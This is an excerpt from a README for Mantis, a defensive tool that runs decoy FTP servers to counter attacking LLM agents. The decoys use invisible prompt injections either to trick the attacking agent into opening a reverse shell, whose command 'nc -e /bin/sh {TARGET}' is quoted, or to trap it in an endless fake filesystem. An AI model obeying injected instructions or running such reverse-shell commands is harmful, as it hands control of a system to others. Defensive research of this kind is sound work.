Search code, repositories, users, issues, pull requests...
An example of a Mantis configuration file is given in ./confs/ftp_hackback_rshell.py. What this configuration means and how you can choose yours will be explained later in this README file. This can be run using the mantis_run.py script:
Running Mantis with confs/ftp_hackback_rshell.py will spawn an FTP decoy server with anonymous credentials that aims to trick the attacking LLM-agent into opening a reverse shell via (invisible) prompt injections. When triggered, it spawns a reverse shell listener on the specified port for testing (⚠️ this configuration is not intended for production ⚠️).
In these examples, we use a very simple reverse shell initiator: nc -e /bin/sh {TARGET} .... This can be changed by altering the variable REVERSE_SHELL_INITIATOR in the configuration file (e.g., confs/ftp_hackback_rshell.py), where the parameter {TARGET} is the IP of the host (which is set automatically by Mantis). If you want to automate the attacker's post-exploitation, you can modify or replace the class Mantis.Decoys.reverse_shell_listener.ReverseShellListenerTest. More on how the configuration files work later.
This starts a fake FTP server with an infinitely deep filesystem and tailored (invisible) prompt injections to keep the attacking LLM agent trapped. The complexity of the tarpit can be set via the EXPECTED_NUMBER_OF_DIRECTORIES variable in ./confs/ftp_filesystem_tarpit.py.
